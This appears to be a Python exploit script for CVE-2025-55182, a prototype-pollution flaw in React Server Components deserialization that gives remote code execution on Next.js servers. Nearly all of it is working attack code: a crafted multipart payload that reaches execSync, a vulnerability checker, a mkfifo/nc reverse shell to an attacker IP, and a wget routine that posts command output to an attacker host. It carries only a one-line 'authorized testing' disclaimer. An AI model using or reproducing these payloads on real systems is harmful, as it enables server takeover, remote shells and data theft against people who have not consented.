#!/usr/bin/env python3
"""
CVE-2025-55182 - React Server Components RCE Exploit
Full Remote Code Execution against Next.js applications

⚠️  FOR AUTHORIZED SECURITY TESTING ONLY ⚠️

Affected versions:
- react-server-dom-webpack: 19.0.0 - 19.2.0
- Next.js: 15.x, 16.x (using App Router with Server Actions)

The vulnerability exploits prototype pollution in the Flight protocol
deserialization to achieve arbitrary code execution.

Credit: 
- Wiz for vuln discovery
- @maple3142 for first working poc
- @dez_ for this vibe poc

"""

import requests
import argparse
import sys
import time


class CVE2025_55182_RCE:
    """Full RCE exploit for CVE-2025-55182"""

    def __init__(self, target_url: str, timeout: int = 15):
        self.target_url = target_url.rstrip('/')
        self.timeout = timeout
        self.session = requests.Session()

    def build_payload(self, command: str) -> dict:
        """
        Build the RCE payload that exploits prototype pollution.

        The payload creates a fake React chunk object that:
        1. Pollutes Object.prototype.then via "$1:__proto__:then"
        2. Sets _formData.get to Function constructor via "$1:constructor:constructor"
        3. Injects code via _prefix that gets passed to Function()
        """
        # Escape single quotes in command
        escaped_cmd = command.replace("'", "'\"'\"'")

        # The malicious fake chunk structure
        payload_0 = (
            '{"then":"$1:__proto__:then",'
            '"status":"resolved_model",'
            '"reason":-1,'
            '"value":"{\\"then\\":\\"$B1337\\"}",'
            '"_response":{'
            '"_prefix":"process.mainModule.require(\'child_process\').execSync(\'' + escaped_cmd + '\');",'
            '"_chunks":"$Q2",'
            '"_formData":{"get":"$1:constructor:constructor"}'
            '}}'
        )

        return {
            '0': (None, payload_0),
            '1': (None, '"$@0"'),  # Reference to chunk 0
            '2': (None, '[]'),      # Empty array for chunks
        }

    def execute(self, command: str) -> dict:
        """
        Execute arbitrary command on the target server.

        Args:
            command: Shell command to execute

        Returns:
            dict with success status and any output
        """
        print(f"[*] Target: {self.target_url}")
        print(f"[*] Command: {command}")

        headers = {
            'Accept': 'text/x-component',
            'Next-Action': 'x',  # Invalid action ID triggers vulnerable path
            'User-Agent': 'CVE-2025-55182-Exploit/1.0',
        }

        files = self.build_payload(command)

        result = {
            'success': False,
            'command': command,
            'target': self.target_url,
        }

        try:
            print(f"[*] Sending exploit payload...")
            resp = self.session.post(
                self.target_url, 
                headers=headers, 
                files=files, 
                timeout=self.timeout
            )
            result['status_code'] = resp.status_code
            result['response'] = resp.text[:500]

            # A 500 response often indicates the exploit worked
            # (the command runs but the response fails to serialize)
            if resp.status_code == 500:
                print(f"[+] Exploit sent successfully (status 500)")
                result['success'] = True
            else:
                print(f"[?] Unexpected status: {resp.status_code}")

        except requests.exceptions.Timeout:
            # Timeout is expected - the server hangs processing the payload
            print(f"[+] Request timed out (expected during RCE)")
            result['success'] = True
            result['timeout'] = True

        except Exception as e:
            print(f"[-] Error: {e}")
            result['error'] = str(e)

        return result

    def check_vulnerability(self) -> bool:
        """Quick check if target is vulnerable"""
        print(f"[*] Checking if {self.target_url} is vulnerable...")

        headers = {
            'Accept': 'text/x-component',
            'Next-Action': 'x',
        }

        # Simple detection payload
        files = {
            '0': (None, '["$1:a:a"]'),
            '1': (None, '{}'),
        }

        try:
            resp = self.session.post(
                self.target_url, 
                headers=headers, 
                files=files, 
                timeout=10
            )

            if resp.status_code == 500 and 'E{"digest"' in resp.text:
                print(f"[+] Target appears VULNERABLE!")
                return True
            else:
                print(f"[-] Target may not be vulnerable (status {resp.status_code})")
                return False

        except Exception as e:
            print(f"[-] Check failed: {e}")
            return False

    def reverse_shell(self, attacker_ip: str, attacker_port: int) -> dict:
        """
        Attempt to establish a reverse shell.

        Args:
            attacker_ip: IP address to connect back to
            attacker_port: Port to connect back to
        """
        # mkfifo reverse shell - works on Alpine/busybox containers
        revshell = (
            f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f"
        )

        print(f"\n[!] Attempting reverse shell to {attacker_ip}:{attacker_port}")
        print(f"[!] Start listener: nc -lvnp {attacker_port}")

        return self.execute(revshell)

    def exfiltrate(self, command: str, attacker_ip: str, attacker_port: int) -> dict:
        """
        Execute command and send output to attacker via HTTP POST.

        Args:
            command: Command to execute
            attacker_ip: IP address to send output to
            attacker_port: Port to send output to

        Start a listener with: nc -lvnp PORT
        Output will arrive as HTTP POST body.
        """
        # Using wget to POST command output back
        exfil_cmd = f'wget --post-data="$({command})" http://{attacker_ip}:{attacker_port}/ -O- 2>/dev/null'

        print(f"\n[!] Executing: {command}")
        print(f"[!] Output will POST to {attacker_ip}:{attacker_port}")
        print(f"[!] Start listener: nc -lvnp {attacker_port}")

        return self.execute(exfil_cmd)


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2025-55182 React Server Components RCE Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog='''
Examples:
  # Check if vulnerable
  python3 exploit_rce.py http://target:3000 --check

  # Execute command (blind)
  python3 exploit_rce.py http://target:3000 -c "id"

  # Execute command with output exfiltration
  python3 exploit_rce.py http://target:3000 --exfil "id" 10.0.0.1 4444

  # Reverse shell (uses mkfifo + nc, works on Alpine)
  python3 exploit_rce.py http://target:3000 --revshell 10.0.0.1 4444
'''
    )

    parser.add_argument('target', help='Target URL (e.g., http://localhost:3000)')
    parser.add_argument('-c', '--command', help='Command to execute (blind)')
    parser.add_argument('--check', action='store_true', help='Check if vulnerable')
    parser.add_argument('--revshell', nargs=2, metavar=('IP', 'PORT'), 
                       help='Reverse shell to IP:PORT')
    parser.add_argument('--exfil', nargs=3, metavar=('CMD', 'IP', 'PORT'),
                       help='Execute CMD and POST output to IP:PORT')
    parser.add_argument('-t', '--timeout', type=int, default=15, 
                       help='Request timeout (default: 15)')

    args = parser.parse_args()

    if not any([args.check, args.command, args.revshell, args.exfil]):
        parser.print_help()
        print("\n[!] Specify --check, --command, --revshell, or --exfil")
        return 1

    exploit = CVE2025_55182_RCE(args.target, args.timeout)

    print("=" * 60)
    print("CVE-2025-55182 - React Server Components RCE")
    print("=" * 60)

    if args.check:
        return 0 if exploit.check_vulnerability() else 1

    if args.command:
        result = exploit.execute(args.command)
        return 0 if result.get('success') else 1

    if args.revshell:
        ip, port = args.revshell
        result = exploit.reverse_shell(ip, int(port))
        return 0 if result.get('success') else 1

    if args.exfil:
        cmd, ip, port = args.exfil
        result = exploit.exfiltrate(cmd, ip, int(port))
        return 0 if result.get('success') else 1

    return 0


if __name__ == '__main__':
    sys.exit(main())

Related vulnerabilities

Meta
[
  {
    "ref": [
      "https://gist.github.com/joe-desimone/ff0cae0aa0d20965d502e7a97cbde3e3"
    ]
  }
]